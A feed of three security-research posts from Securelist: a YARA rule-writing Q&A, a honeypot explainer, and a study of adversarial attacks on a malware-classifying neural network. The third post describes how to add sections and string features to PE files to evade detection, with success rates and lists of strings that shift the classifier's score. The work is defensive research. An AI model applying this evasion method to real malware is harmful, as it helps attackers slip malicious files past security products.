Security technologies – Securelist
https://securelist.com

Applied YARA training Q&A
https://securelist.com/applied-yara-training-qa/104007/
Fri, 03 Sep 2021

Introduction

On August 31, 2021, VirusTotal and Kaspersky ran a joint webinar focused on YARA best practices and real-world examples. If you didn’t have the chance to watch the webinar live, you can see the recording on BrightTALK: Applied YARA training.

The webinar received an overwhelming response, and we would like to thank all the participants for sharing their thoughts, questions and ideas; most of all, we are happy to see so much interest and enthusiasm for YARA!

In the webinar’s 90 minutes we only had the chance to answer a fraction of the questions we received. We would still like to answer the remaining ones, since many of them are quite relevant to real-world situations and practices, and could be useful to other security practitioners. Even better, for the trickier questions we decided to ask for help from the creator of YARA himself, Victor Manuel Alvarez, who helps answer them below. If you have further questions, please feel free to send them to us in the comments section. We will be happy to answer them too!

Stay safe, stay secure and Happy hunting!

Costin, Vicente and Victor

Q&A:

RULE WRITING

Q: How difficult is it to write a YARA rule for obfuscated payloads?
Q: What file features do you experts normally look into when it comes to obfuscated files? How can YARA help?
Q: What would be your tip / best practices for writing rules to catch obfuscated binaries?

Vicente here. Obfuscated files are tricky, but YARA can still be useful. We can use all the metadata and file geometry for detection. Also, depending on where the obfuscation is, we may be able to use some portions of the code for detection: for instance, if only the strings are obfuscated with some custom method, the code performing the obfuscation can itself be useful.

Costin here. In general, it is a lot more difficult to write YARA rules for obfuscated payloads. Depending on the obfuscation method, one can still find ways to detect them. For example, assuming a specific cryptor or packer was used, you can still write a rule for the packer (e.g., UPX), or rely on an unpacking engine to give you the plain code. Some platforms, such as VirusTotal, automatically unpack known tools for you, which allows one to write simple YARA rules for the unpacked code. When the obfuscation is polymorphic (for instance, the code is expanded with dummy instructions and operands are split across several operations), one can try to use other file properties, such as metadata, entropy, import hashes or other data that stays constant across different generations. In short, there is no single rule on how to write rules for obfuscated code, but in some cases it is possible.

Q: Would hashes used for API hashing, for example, be helpful for a YARA rule? Since these can change in a future campaign, I’m in doubt.

Costin here. Absolutely — API hashing can be super useful for detecting malware, especially when there are very few unique strings that can be used in the rule, or when the malware is otherwise obfuscated. YARA actually provides a nice, easy-to-use solution — the PE module implements the standard Mandiant import hash function as pe.imphash(). This can be used in a YARA rule condition such as:
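A minimal sketch of such a condition (the hash value below is a placeholder, not a real detection):

    import "pe"

    rule imphash_example
    {
        condition:
            // placeholder imphash value, for illustration only
            pe.imphash() == "2c2e5e9c1c2f6a3b4d5e6f7a8b9c0d1e"
    }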

Q: Are you trying rules against a set of malware before releasing it?

Costin here. Yes, extensive QA of a YARA rule is critical for us before releasing it publicly or to customers. For this purpose, we use several internal databases of both malicious files and known clean code. To make sure a YARA rule detects more than just one sample, we try to run it against our entire malware collection, which is over five petabytes at the moment. Sometimes, when time is of the essence, we run it on a subset of the malware collection, such as specific PE files received during the last 12 months, or, say, script files. In many cases, testing a rule on clean files is even more important than testing it on malware! Based on our experience, we’ve seen countless instances of YARA rules published by security companies or even governmental agencies that produced false positives when used on a real system. To simplify the testing of YARA rules, you can either use VirusTotal’s Retrohunt feature, or set up tests on your own collections using our open-source KLARA project.

Q: Won’t typos also restrict the YARA rule to a particular sample or samples distributed under one campaign?

Vicente here. That could happen, but often the typos are difficult to replace. For example, sometimes typos are in the commands that the malware receives from the server, and fixing them would require the attacker to redeploy both the server and client sides of the malware. In other cases, attackers remain entirely unaware of the typo, perhaps because they are not familiar with the language and used a weird expression that no native speaker would, and it can stay there forever. We can find these typos everywhere, including metadata, comments, etc.

Q: Where are good sources for large amounts of known good clean data?

Costin here. There are several public, free, good sources of known clean data. Some have suggested the NIST reference set; you can also build your own from things like a Windows installation, a Linux install, Android/iOS dumps and the like. It’s important to also include third-party software, such as Chrome, Firefox or Adobe Reader: a lot of the false positives produced by publicly available YARA rules occur on precisely such software!

Q: How useful are YARA Rule Generators like Florian Roth’s yarGen?

Vicente here. YARA rule generators are VERY useful, but we do not recommend using raw generated rules without an extra round of manual polishing. We believe it is more useful to use them for a first pass to extract potentially relevant strings from a collection of samples we are analyzing, and from there use the results to help build more refined rules.

Q: Is it better to use wide, ascii, both, or none?

Costin here. Whether to use wide, ascii or both (or neither) depends on the case. Depending on how a piece of malware is compiled, the strings you see inside could be ASCII (single-byte) or wide (double-byte, UTF-16). YARA allows you to easily search for UTF-16 strings through the wide modifier. By default, ASCII is assumed every time you assign a string to a variable; if you want to search for both encodings, you need to use the "ascii wide" modifiers. Adding "wide" to the ASCII strings you are searching for might find you additional matches.
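A hypothetical illustration of the modifiers:

    rule modifier_example
    {
        strings:
            $a = "cmd.exe"              // ascii (single-byte) only, the default
            $b = "cmd.exe" wide         // UTF-16LE (two bytes per character) only
            $c = "cmd.exe" ascii wide   // matches either encoding
        condition:
            any of them
    }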

Q: If a rule generates false positives on a very specific sample, would you suppress a specific hash in the rule directly or rather improve the whole logic?

Vicente here. The answer is — "it depends". If a very particular binary produces a false positive in an otherwise solid rule, we can keep the rule as long as we know what we are doing: for example, if we use it for hunting privately, we can just exclude that specific FP file by hash. If the rule will be used externally or automatically, for instance in a production environment for detection, then it is better to fix the false positive in the logic itself.
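A sketch of the hash-exclusion approach (placeholder hash; note that hashing the whole file has a performance cost, so this is best kept to private hunting rules):

    import "hash"

    rule solid_rule_with_exclusion
    {
        strings:
            $a = "some unique string"
        condition:
            $a and
            // exclude the single known false positive by its MD5 (placeholder value)
            not hash.md5(0, filesize) == "d41d8cd98f00b204e9800998ecf8427e"
    }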

Q: Some programming languages have automatic formatters (like ‘Black’ in Python, or gofmt in Golang) — do you recommend something similar for YARA, to maintain good formatting across a team?

Víctor here. As far as I know such a tool doesn’t exist. There are some alternative parsers for YARA, which are able to read a YARA source file, build an abstract syntax tree (AST) from it, and regenerate the source code from the AST. But they have limitations that make them unsuitable for building a tool like gofmt (for example the comments are completely lost).

YARA INTERNALS

Q: Does YARA "digest" and optimize a ruleset, for example if a user writes "i001" and "i001" in different places?

Víctor here. YARA doesn’t perform any optimization on conditions; they are evaluated exactly as they are written. No attempt is made to detect useless branches in the condition: if you write "X or Y or Z or true", YARA evaluates X, Y and Z; it is not smart enough to realize that the condition is always true. Also, if you use the same pattern/string in different rules, they are treated as if they were different; YARA doesn’t realize that you are searching for the same string.

Q: Can YARA run only on files with macOS extended attributes (xattrs), for example com.apple.metadata:kMDItemDownloadedDate or com.apple.quarantine?

Vicente here. At the moment, I’m not aware of any module able to interact with them.

Q: I have seen that hash is case-sensitive; I have to use lower case. Will this change in the future?
Q: Hash looks case-sensitive. Can you confirm that?

Víctor here. The next version of YARA will include the icompare operator for case-insensitive string comparison. The == operator maintains its case-sensitive semantic when used for comparing strings, but with icompare you don’t need to worry about whether the values returned by the hash module are upper or lower case.

Q: Does YARA see the filename of the file being scanned?

Vicente here. At the moment, you cannot specify any condition about the filename in a rule, as YARA is designed to check just the content and structure of the file, and the file name can easily change. Nevertheless, this option exists if you use the VT YARA module, which is available to take advantage of file metadata for YARA rules running on VirusTotal. You can also use the -d command-line option to define an external variable that contains the filename.

Víctor here. I would like to provide more context about this. The reason for not including a "filename" keyword in the same way as "filesize" is that "filesize" makes sense in almost any context (except when scanning a process address space), as the data being scanned always has a size. "filename", however, makes sense when you are using the YARA command-line tool to scan your hard drive, but not where YARA is scanning data without knowing where it comes from. Still, given how often I’ve seen this question asked, I’m considering some intermediate solution, like allowing the command-line tool to define a variable that automatically takes the name of the current file.
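A sketch of the external-variable workaround Vicente mentions (the variable name is our choice and must be defined at scan time):

    rule filename_example
    {
        condition:
            filename == "invoice.exe"
    }

    // invoked as:
    //   yara -d filename=invoice.exe filename_example.yar invoice.exe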

Q: Is it possible to use YARA to monitor strings in PDF documents? Or is it medium-dependent?

Vicente here. It is possible. However, keep in mind that strings are not represented inside the file the same way they are displayed to a reader. It is important to check the content of the file itself with utilities such as "strings" or any hex editor, and select which strings can be used for a YARA rule; selecting strings based on how they appear in the rendered PDF will not necessarily work.

Q: Is YARA compatible with the ELK stack?

Vicente here. There are different available options, like plugins to incorporate events matching YARA rules into Elastic, for example.

EFFICIENCY

Q: Is uint16(0) faster than $magic at 0? (Where $magic is the hex value)

Vicente and Costin here. The $magic check should be considered obsolete and is hopefully not used anymore in any public rules. Please use uint16(0) or the Magic module instead. This is because defining a string such as $mz="MZ" will cause YARA to search for this short string throughout the file and save all the matches, no matter the offset, which greatly increases resource usage: it slows down scanning and eats up more memory. In general, short strings should be avoided in YARA rules for this reason, or always followed by the "fullword" modifier.
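For reference, the header check looks like this (0x5A4D is "MZ" read as a little-endian 16-bit integer):

    rule mz_header_check
    {
        condition:
            uint16(0) == 0x5A4D   // "MZ" at offset 0
    }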

Q: In your experience, is CPU or I/O the bigger constraint? Can YARA run at low priority, only when the user is idle, or restricted to a time schedule? I am thinking about tunability like World Community Grid. Does YARA use sophisticated I/O scheduling?

Víctor here. That depends a lot on your rules. If you have a few high-performance rules, the bottleneck will certainly be I/O, but that can change drastically if you have many rules or they are not very fast. YARA doesn’t do anything special with regards to I/O: it just uses memory-mapped files and relies on the operating system. On both Windows and Linux, YARA tells the operating system that files are likely to be read sequentially, so that the OS can take that into account and read ahead aggressively.

Q: Hello. Is the "nocase" option efficient? We can never know what case we will find in a malware file, but maybe the "nocase" option increases the search time and the resources used. How do we determine if we need this option?

Víctor here. It depends on the string, but generally speaking "nocase" introduces a performance penalty and should be avoided if possible. Many people use "nocase" and "wide" just in case: they are not really sure about it, but they use them because it doesn’t do any harm (or so they think). My advice is to do exactly the opposite: if you don’t have a clear reason for using those modifiers, don’t use them. If you know for sure, or have good reason to believe, that the string can appear in some arbitrary casing, use "nocase", but avoid it otherwise.

Q: My understanding is that the ‘filesize’ condition is evaluated AFTER all strings have been processed. If this is the case, then filesize cannot be used to make rules more efficient by eliminating samples based on filesize BEFORE strings are evaluated. Is my understanding correct? If so, do you know the reason why filesize is evaluated after strings?

Víctor here. That’s 100% correct. The reason for that behavior is that YARA is optimized for the case in which you have many rules. From the performance standpoint, the best thing to do when you have a lot of rules is to scan the file in a single pass first, looking for all the strings from all the rules at once, and then evaluate all the conditions. Evaluating the conditions first, and searching for each string individually as it is used in a condition, does not scale well when you have thousands of rules. With a very high number of rules, the odds are that you are going to need to read and scan the file anyway, as at least one of your conditions won’t filter out the file based on its size.

USING YARA

Q: if you have a mature team, and a large set of rules that were developed over time — do you have any thoughts on how to go back and re-evaluate if rules are still good, or need to be updated (and how often, etc.) — or other ways to track metrics on each rule? (‘Hey, this one fired once, and it was a great find — this second one fires with every SCR, and needs some work’)

Vicente here. This is an excellent question. The important thing is to create a policy based on your needs and how you use these rules. Some rules can stay valid for years while others change very rapidly, and that depends both on the rule itself and on the threat it monitors. It is always good to have a baseline detection per rule (what it should be detecting) and alternative methods to double-check that the detected samples indeed belong to the family/actor you are monitoring. From this point, you need to keep this triad of rules, detection methods and detected samples updated regularly, polishing rules as needed and replacing them once they are no longer relevant.

Q: Is there a way to centrally run YARA rules on all network workstations without depending on third-party tools like Nessus or supported antivirus platforms?

Vicente here. There are different EDRs and utilities to do so. However, this kind of practice tends to be overkill in most cases. We recommend carefully selecting which rules to run and which folders to scan, and adding further conditions to the rules in order to avoid scanning unnecessary files (you can play with conditions such as file format, size, timestamps, etc.).

Q: We have tried YARA ourselves and there’s no doubt about the capabilities. What we want to understand is what is the correct way to leverage YARA? Shall we scan some workstations regularly with industry/region specific threat intelligence? Or a better approach could be to run periodic scans based on targeted hypothesis based threat hunting? Shall we only run it to investigate incidents?

Vicente here. This totally depends on your goals, as all of the above are very common use cases. In most cases, you will want to scan a small percentage of sensitive or suspicious files on a regular basis. The same goes for your rules: you may want to use the ones corresponding to active and relevant threats. In parallel, you will always have your collection active for hunting and ready for any IR/forensic work if needed.

Q: Can we also search within memory with YARA?

Vicente here. It is possible. There are several EDRs and tools that allow you to do so. It is also always possible to run YARA against a memory dump, for instance using Volatility. Last but not least, you can directly scan a running process, if you know its PID, by running "yara rules.yar <PID>".

Q: Is it possible to utilize hash detection with YARA?

Vicente and Costin here. Yes, it is. You can use the "hash" module and calculate different hashes for files or sections. An example of such a rule can be found in XProtect.yara on GitHub:
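The original snippet was lost in formatting; a minimal sketch of a hash-based rule (with a placeholder value, not the actual XProtect rule) looks like this:

    import "hash"

    rule hash_match_example
    {
        condition:
            filesize < 100KB and
            // placeholder MD5, not a real indicator
            hash.md5(0, filesize) == "00000000000000000000000000000000"
    }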

Q: What do you recommend for managing a large collection of YARA rules (deduping, updating versions, etc)?

Vicente here. We do not recommend any particular utility for this; many researchers simply use GitHub. In terms of procedure, our recommendation would be to regularly check that rules detect what they are supposed to detect and to check for false positives. One utility you can use in this direction is YARA-CI. We also recommend keeping different collections for different purposes, for instance incident response, forensics, hunting, memory scanning, etc.

Q: How can we start using YARA for malicious email attachments?

Vicente here. There are different mail security appliances that allow you to do so. You can always check attachments separately.

Q: For memory dump, I was not able to scan directly by attaching it, rather I had to mount its file system (e.g. MemProcFS) before YARA can work. Am I correct?

Vicente here. Right. Another option is using the dedicated utility in Volatility to run YARA against memdumps.

VIRUSTOTAL

Q: Will VT allow us to scan older parts of the corpus with retrohunt?

Vicente here. At the moment, VirusTotal Retrohunt works on a 90-day back-index, which can be expanded to one year depending on your subscription.

Q: Can YARA rules be shared with the VT community, or can they only be shared from user to user?

Vicente here. We incorporate a number of repositories from the community as crowdsourced YARA rules, you can find a list of contributors here. If you would like to contribute, please contact us!

Q: Can we find strings inside PDF files on VirusTotal with YARA rules? We can see it working on other file types but not on PDFs; we didn’t really see it working and could not find anything about it in the VT YARA documentation.

Vicente here. As described in a previous answer, nothing changes when using VirusTotal to find a string within a PDF compared to using YARA in any other environment.

Q: What are ways of hunting with YARA beyond VirusTotal?

Vicente here. Hunting is a technique/art/discipline that can be done on any platform. Basically, you just need a collection of data you can explore to find what you are looking for. Usually that would mean a collection of malware with as much data on top of it as possible. At VirusTotal we work hard to make it as convenient as possible.

MISC

Q: Also consider that you can tip off the threat actor that you have found their malware…

Vicente here. This is true. Many actors are interested in understanding how they are detected, which can become quite obvious when checking publicly available YARA rules. It is a cat-and-mouse game, but fortunately the fact that actors understand how they are being detected doesn’t mean they can avoid it in an easy or quick way.

Q: Can anyone explain why YARA was created with a unique schema (yet similar) compared to SQL? Do developers see YARA rules as a catch-all rule writing standard that will eventually become a standard for querying any data? I find YARA rules far easier to write/read than many formats, and it seems more modern, but the evolution is unclear.

Víctor here. The syntax was created with legibility in mind, because YARA rules are intended to be created and consumed by humans. The idea was to create a language that looked more like a programming language than like SQL; in fact, you can find echoes of C in YARA’s syntax. However, YARA doesn’t aim to be a general-purpose query language for usages outside the scope it was designed for. Any future enhancements of the syntax will be oriented towards improving expressiveness and legibility, but always within the boundaries of its current purpose.

Q: How do you communicate the importance and utility of incorporating threat hunting techniques (like writing YARA rules) to muggles?

Vicente here. Threat Hunting is one of the best techniques we have. We use it to defend ourselves from current attacks, by expanding our visibility and establishing monitoring on threats targeting us. It is also one of the most powerful weapons we have to detect unknown threat activity.

Q: Maybe I’m jumping ahead, please forgive me if I do; but how do commercial anti-virus companies use YARA to determine whether a file is malicious? How do you deal with false positives?

Vicente here. YARA is one of the methods or engines that AV companies might use to determine whether something is malicious. In essence it is not different from other methods, and depending on how it is used, it can lead to false positives. As usual, this has nothing to do with the tools used but with how solid the rules are, whether they are double-checked with a second method, whether there is a reputation system in place, how good the heuristics are, etc.

That’s all for now!
Stay safe everyone and hope to see you at our next webinars!

Online resources:

Detecting unknown threats: a honeypot how-to
https://securelist.com/detecting-unknown-threats-a-honeypot-how-to/102990/
Mon, 28 Jun 2021

Catching threats is tricky business, especially in today’s threat landscape. To tackle this problem, cybersecurity researchers have for many years been using honeypots – a well-known deception technique in the industry. Dan Demeter, Senior Security Researcher with Kaspersky’s Global Research and Analysis Team and head of Kaspersky’s honeypot project, explains what honeypots are, why they are recommended for dealing with external threats, and how you can set up your own simple SSH honeypot. This post offers a condensed version of his presentation alongside the video, which you can view below.

What are honeypots?

A honeypot is a special piece of software that emulates a vulnerable device. The emulated devices can be of a wide variety of types: smart light bulbs, home security DVRs, fridges, microwaves, etc. Deployed publicly on the Internet, honeypots mimic real devices and, in essence, function as traps for the attackers targeting such devices. Sometimes honeypots also allow defenders to attract and identify new, previously unknown attacks and exploits.

Who needs to set up honeypots? Why?

To protect an organization and its network, the IT security department usually deploys a variety of protection mechanisms, such as EDR, firewall rules or security policies. In our experience, however, these mechanisms might not be enough. Even before the shift to remote work, organizations had many vulnerable devices exposed to the Internet that they did not know about. With the shift to remote work, the number of remote stations has increased, and so has the number of exposed network devices, making corporate networks even more vulnerable. Honeypots help strengthen the corporate defense system: planted in key parts of the network, they serve as decoys that register external attacks and capture the threats used in them. This provides an opportunity to further analyze an attack against the organization and learn how to fend it off.

What is Kaspersky’s honeypot project and how can organizations participate?

Honeypot systems require high visibility: the higher, the better, as that helps cover a wider attack surface. That’s why it is important to collaborate with ISPs, security service vendors or research groups on the Internet to detect new attacks. Kaspersky continuously improves and strengthens its partnerships with various research groups and ISPs around the world to enhance detection capabilities. Kaspersky offers Honeypots-as-a-Service: we provide the entire infrastructure, and our partners only need to set up and deploy honeypot nodes in their networks. These nodes are connected to each other and to our honeypot infrastructure. Kaspersky monitors them, analyzes and aggregates the data, identifies the attacks, and offers its partners statistics (such as the most common usernames and passwords used, attacker IPs, types of attacks, etc.), as well as any other artefacts that might be of interest to them. To join Kaspersky’s honeypot project, email honeypots@kaspersky.com.

To learn how to set up an SSH-honeypot to deal with attackers who are seeking to bruteforce your logins and passwords, watch the full video with Dan Demeter, where he answers basic questions about honeypots.
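As a companion sketch (our own minimal illustration, not the setup from the video), the core idea of a simple SSH honeypot can be shown in a few lines of Python: a fake service that presents an SSH banner and logs who connects and which client they use.

    import datetime
    import socket

    # Minimal SSH "banner" honeypot sketch: it does not implement the SSH protocol,
    # it only logs connecting IPs and the client banners they present.
    HOST, PORT = "0.0.0.0", 2222   # unprivileged port; forward port 22 here if needed

    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen(5)

    while True:
        conn, addr = srv.accept()
        conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")   # pretend to be a real SSH server
        banner = conn.recv(256)                    # the client identifies itself first
        print(datetime.datetime.now(), addr[0], banner.strip())
        conn.close()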

How to confuse antimalware neural networks. Adversarial attacks and protection
https://securelist.com/how-to-confuse-antimalware-neural-networks-adversarial-attacks-and-protection/102949/
Wed, 23 Jun 2021

Introduction

Nowadays, cybersecurity companies implement a variety of methods to discover new, previously unknown malware files. Machine learning (ML) is a powerful and widely used approach for this task. At Kaspersky we have a number of complex ML models based on different file features, including models for static and dynamic detection, for processing sandbox logs and system events, etc. We implement different machine learning techniques, including deep neural networks, one of the most promising technologies that make it possible to work with large amounts of data, incorporate different types of features, and boast a high accuracy rate. But can we rely entirely on machine learning approaches in the battle with the bad guys? Or could powerful AI itself be vulnerable? Let’s do some research.

In this article we attempt to attack our product anti-malware neural network models and check existing defense methods.

Background

An adversarial attack is a method of making small modifications to objects in such a way that the machine learning model begins to misclassify them. Neural networks (NN) are known to be vulnerable to such attacks. Research on adversarial methods historically started in the sphere of image recognition. It has been shown that minor changes to pictures, such as the addition of insignificant noise, can cause remarkable changes in the predictions of classifiers and even completely confuse ML models[i].

The addition of inconspicuous noise causes NN to classify the panda as a gibbon

Furthermore, the insertion of small patterns into the image can also force models to change their predictions in the wrong direction[ii].

Adding a small patch to the image makes NN classify the banana as a toaster

After this susceptibility to small data changes was highlighted in the image recognition of neural networks, similar techniques were demonstrated in other data domains. In particular, various types of attacks against malware detectors were proposed, and many of them were successful.

In the paper “Functionality-preserving black-box optimization of adversarial windows malware”[iii], the authors extracted data sequences from benign portable executable (PE) files and added them to malware files, either at the end of the file (padding) or within newly created sections (section injection). These changes affected the scores of the targeted classifier while preserving file functionality by design. The authors formed a collection of such malware files with random benign file parts inserted. Using genetic algorithms (including mutations, cross-over and other types of transformations) and the malware classifier’s scores, they iteratively modified the collection of malware files, making them harder and harder for the model to classify correctly. This was done via optimization of an objective function containing two conflicting terms: the classification output on the manipulated PE file, and a penalty function that evaluates the number of bytes injected into the input data. Although the proposed attack was effective, it did not use state-of-the-art ML adversarial techniques and relied on public pre-trained models. Also, the authors measured the average effectiveness of the attack against VirusTotal anti-malware engines, so we don’t know for sure how effective it is against the cybersecurity industry’s leading solutions. Moreover, since most security products still use traditional detection methods, it’s unclear how effective the attack was against the ML component of anti-malware solutions, or against other types of detectors.

Another study, “Optimization-guided binary diversification to mislead neural networks for malware detection”[iv], proposed a method for functionality-preserving changes to assembler operations in functions, and adversarial attacks based on it. The algorithm randomly selects a function and a transformation type, and tries to apply the selected changes. An attempted transformation is applied only if it makes the targeted NN classifier more likely to misclassify the binary file. Again, this attack lacks ML methods for adversarial modification, and it has not been tested on specific anti-malware products.

Some papers proposed gradient-driven adversarial methods that use knowledge about the model structure and features for malicious file modification[v]. This approach provides more opportunities for file modification and results in better effectiveness. Although the authors conducted experiments to measure the impact of such attacks on specific malware detectors (including public models), they did not work with production anti-malware classifiers.

For a more detailed overview of the various adversarial attacks on malware classifiers, see our whitepaper and “A survey on practical adversarial examples for malware classifiers“.

Our goal

Since Kaspersky anti-malware solutions, among other techniques, rely on machine learning models, we’re extremely interested in investigating how vulnerable our ML models are to adversarial attacks. Three attack scenarios can be considered:

White-box attack. In this scenario, all information about a model is available. Armed with this information, attackers try to convert malware files (detected by the model) to adversarial samples with identical functionality but misclassified as benign. In real life this attack is possible when the ML detector is a part of the client application and can be retrieved by code reversing. In particular, researchers at Skylight reported such a scenario for the Cylance antivirus product.

Gray-box attack. Complex ML models usually require a significant amount of both computational and memory resources. Therefore, the ML classifiers may be cloud-based and deployed on the security company servers. In this case, the client applications merely compute and send file features to these servers. The cloud-based malware classifier responds with the predictions for given features. The attackers have no access to the model, but they still have knowledge about feature construction, and can get labels for any file by scanning it with the security product.

Black-box attack. In this case, feature computation and model prediction are performed on the cybersecurity company’s side. The client applications just send raw files, or the security company collects the files in another way. Therefore, no information about feature processing is available to the attacker. There are strict legal restrictions on sending information from the user machine, as well as traffic limitations, which means the malware detection process usually can’t be performed for all user files on the fly. An attack on a black-box system is therefore the most difficult.

Consequently, we will focus on the first two attack scenarios and investigate their effectiveness against our product model.

Features and malware classification neural network

We built a simple but well-functioning neural network similar to our product model for the task of malware detection. The model is based on static analysis of executable files (PE files).

Malware classification neural network

The neural network model works with the following types of features:

  • PE Header features – features extracted from PE header, including physical and virtual file size, overlay size, executable characteristics, system type, number of imported and exported functions, etc.
  • Section features – the number of sections, physical and virtual size of sections, section characteristics, etc.
  • Section statistics – various statistics describing raw section data: entropy, byte histograms of different section parts, etc.
  • File strings – strings parsed from the raw file using a special utility and packed into a bloom filter

Let’s take a brief look at the bloom filter structure.

Scheme of packing strings into bloom filter structure. Bits related to strings are set to 1

The bloom filter is a bit vector. For each of the k strings, n predefined hash functions are calculated. The value of each hash function determines the position of a bit to be set to 1 in the bloom filter vector. Note that different strings can be mapped to the same bit; in this case the bit simply remains set (equal to 1). This way we can pack all file strings into a vector of a fixed size.
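A toy sketch of the packing step (the vector size and the way the n hash functions are derived are our illustrative choices, not the product’s):

    import hashlib

    M = 4096   # bloom filter size in bits (illustrative)
    N = 3      # number of hash functions per string (illustrative)

    def pack_strings(strings):
        bloom = [0] * M
        for s in strings:
            for i in range(N):
                # derive N "different" hash functions by salting a single digest
                h = hashlib.md5(f"{i}:{s}".encode()).hexdigest()
                bloom[int(h, 16) % M] = 1   # collisions simply leave the bit set
        return bloom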

We trained the aforementioned neural network on approximately 300 million files – half of them benign, the other half malware. The classification quality of this network is displayed in the ROC curve. The X-axis shows the false positive rate (FPR) in logarithmic scale, while the Y-axis corresponds to the true positive rate (TPR) – the detection rate for all the malware files.

ROC curve for trained malware detector

In our company, we focus on techniques and models with very low false positive rates. So, we set a threshold for a 10⁻⁵ false positive rate (one false positive per 100,000 clean files). Using this threshold, we detected approximately 60% of the malware samples in our test collection.

Adversarial attack algorithm

To attack the neural network, we use the gradient method described in “Practical black-box attacks against machine learning“. For a malware file, we want to change the score of the classifier so as to avoid detection. To do so, we calculate the gradient of the final NN score and back-propagate it through all the NN layers down to the file features. The main difficulty of creating an adversarial PE is preserving the functionality of the original file. To achieve this, we define a simple strategy: during the adversarial attack we only add new sections, while existing sections remain intact. In most cases these modifications don’t affect the file execution process.

We also have some restrictions for features in the new sections:

  • Different size-defining features (related to file/section size, etc.) should be in the range from 0 to some not very large value.
  • Byte entropy and byte histograms should be consistent. For example, the values in a histogram for a buffer of size S should sum to S.
  • We can add bits to the bloom filter, but can’t remove them (it is simple to add new strings to the file, but difficult to remove).

To satisfy these restrictions we use an algorithm similar to the one described in “Deceiving end-to-end deep learning malware detectors using adversarial examples”, but with some modifications: we move the “fix_restrictions” step into the “while” loop and expand the restrictions.

Here ∂F(x, y)/∂x is the gradient of the model output with respect to the features, fix_restrictions projects the features onto the aforementioned permitted value area, and ε is the step size.

The adversarial-generating loop contains two steps:

  • We calculate the gradient of the model score with respect to the features, and move the feature vector x in the direction of the gradient for all non-bloom features.
  • We update the feature vector x to meet the existing file restrictions: for example, integer file features are rounded and put back into the required intervals.

For bloom filter features we just set the one bit corresponding to the largest gradient. Strictly speaking, we should also find a string for this bit and set the other bits corresponding to that string. In practice, however, this level of precision is not necessary and has almost no effect on the process of generating adversarial samples. For simplicity, we will skip the addition of the other corresponding string bits in further experiments. A schematic sketch of the whole loop follows.
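This toy sketch (our own notation: a linear score stands in for the NN, and all sizes are illustrative) shows the shape of the loop:

    import numpy as np

    rng = np.random.default_rng(0)
    w = rng.normal(size=100)                                    # stand-in "model" weights
    x = np.concatenate([rng.uniform(0, 255, 50),                # continuous file features
                        rng.integers(0, 2, 50).astype(float)])  # bloom filter bits

    eps, threshold = 0.5, 0.0          # step size and detection threshold

    def F(x):
        return w @ x                   # score: "malicious" if above the threshold

    def fix_restrictions(x):
        x[:50] = np.clip(np.round(x[:50]), 0, 255)   # size-like features stay valid integers
        return x

    for _ in range(100):
        if F(x) <= threshold:
            break                                    # detection removed
        g = w                                        # dF/dx of the linear stand-in model
        x[:50] -= eps * g[:50]                       # move continuous features to lower the score
        unset = np.where(x[50:] == 0.0)[0]           # bloom bits can only be set, never cleared
        if unset.size:
            best = unset[np.argmin(g[50:][unset])]   # the bit whose activation lowers the score most
            x[50 + best] = 1.0
        x = fix_restrictions(x)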

White-box attack

In this section we investigate the effectiveness of the algorithm for the white-box approach. As mentioned above, this scenario assumes the availability of all information about the model structure, as is the case when the detector is deployed on the client side.

By following the algorithm of adversarial PE generation, we managed to confuse our classification model for about 89% of the malicious files.

Removed detection rate. X-axis shows the number of steps in algorithm 1; Y-axis shows the percentage of adversarial malicious files that went undetected by the NN classifier (while their original versions were detected).

Thus, it is easy to change files in order to avoid detection by our model. Now, let us take a closer look at the details of the attack.

To understand the vulnerabilities of our NN, we ran the adversarial algorithm for different feature types separately. First, we tried changing string features only (the bloom filter). Doing so confuses the NN for 80% of the malware files.

Removed detection rate for string changing only

We also explored which bits of the bloom filter are most often set to 1 by the adversarial algorithm.

The histogram of bits added by the adversarial algorithm to the bloom filter. The Y-axis corresponds to the ratio of files that each bit is added to. A higher rate means that bit is important for decreasing the model score

The histogram shows that some bits of the bloom filter are more important for our classifier, and setting them to 1 often leads to a decrease in the score.

To investigate the nature of such important bits, we reversed the popular bits back to strings and obtained a list of strings likely to change the NN score from malware to benign:

Pooled   mscoree.dll   CWnd   MessageBoxA   SSLv3_method   assembly manifestVersion="1.0" 
xmlns="urn…   SearchPathA   AVbad_array_new_length@std   Invalid color format in %s file   
SHGetMalloc   Setup is preparing to install [name] on your computer   
e:TScrollBarStyle{ssRegular,ssFlat,ssHotTrack   SetRTL   VarFileInfo   cEVariantOutOfMemoryError   
vbaLateIdSt   VERSION.dll   GetExitCodeProcess   mUnRegisterChanges   ebcdic-Latin9--euro   
GetPrivateProfileStringA   XPTPSW   cEObserverException   LoadStringA   fFMargins   SetBkMode   
comctl32.dll   fPopupMenu1   cTEnumerator<Data.DB.TField   cEHierarchy_Request_Err   fgets   
FlushInstructionCache   GetProcAddress   NativeSystemInfo   sysuserinfoorg   uninstallexe   RT_RCDATA   
textlabel   wwwwz

We also tried to attack the model to force it to misclassify benign files as malware (inverse problem). In this case, we obtained the following list:

mStartTls   Toolhelp32ReadProcessMemory   mUnRegisterChanges   ServiceMain   arLowerW   
fFTimerMode   TDWebBrowserEvents2DownloadCompleteEvent   CryptStringToBinaryA   
VS_VERSION_INFO   fFUpdateCount   VirtualAllocEx   Free   WSACreateEvent   File I/O error %d   
VirtualProtect   cTContainedAction   latex   VirtualAlloc   fFMargins   set_CancelButton   FreeConsole   
ntdll.dll   mHashStringAsHex   mGetMaskBitmap   mCheckForGracefulDisconnect   fFClientHeight   
mAddMulticastMembership   remove_Tick   ShellExecuteA   GetCurrentDirectory   get_Language   
fFAutoFocus   AttributeUsageAttribute   ImageList_SetIconSize   URLDownloadToFileA   CopyFileA   UPX1   
Loader

These sets of “good” and “bad” strings look consistent and plausible. For instance, the strings ‘MessageBoxA’ and ‘fPopupMenu1’ are actually often used in benign files. And vice versa, strings like ‘Toolhelp32ReadProcessMemory’, ‘CryptStringToBinaryA’, ‘URLDownloadToFileA’ and ‘ShellExecuteA’ look suspicious.

We also attempted to confuse our model using binary section statistics only.

Removed detection rate for added sections, without bloom features. X-axis corresponds to the number of added sections, Y-axis to the percentage of malware files that become “clean” during adversarial attacks

The graph shows that it is possible to remove detection for about 73% of malware files. The best result is achieved by adding 7 sections.

